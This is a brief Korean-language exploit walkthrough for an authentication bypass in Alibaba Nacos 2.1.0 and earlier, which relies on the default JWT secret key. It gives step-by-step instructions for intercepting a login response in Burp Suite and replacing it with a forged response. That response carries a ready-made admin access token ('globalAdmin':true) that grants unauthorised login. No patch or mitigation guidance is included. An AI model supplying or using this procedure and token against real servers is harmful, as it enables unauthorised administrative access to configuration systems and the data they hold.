
Alibab Nacos 무단 로그인
Nacos <= 2.1.0에 영향을 주는 Nacos에서 문제가 발견되었습니다. Nacos 사용자가 기본 JWT 키를 사용하여 무단 액세스 취약점이 발생합니다. 이 취약점을 통해 공격자는 사용자 이름과 비밀번호 인증을 우회하고 Nacos 사용자로 직접 로그인할 수 있습니다.
Nacos <= 2.1.0 버전
1단계:Nacos 웹사이트에 직접 접속하여 임의의 사용자 이름과 비밀번호를 입력하고 Burpsuite로 패킷을 캡처합니다.

2단계:응답 패킷을 가로챕니다.

3단계: 데이터 패킷을 다음과 같이 수정합니다.
HTTP/1.1 200
Date: Thu, 10 Nov 2022 01:27:16 GMT
Content-Type: application/json
Content-Length: 13
Connection: close
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Content-Security-Policy: script-src 'self'
Server: elb
{"accessToken":"eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA","tokenTtl":18000,"globalAdmin":true}

4단계: 데이터 패킷을 전달한 후 로그인에 성공합니다.
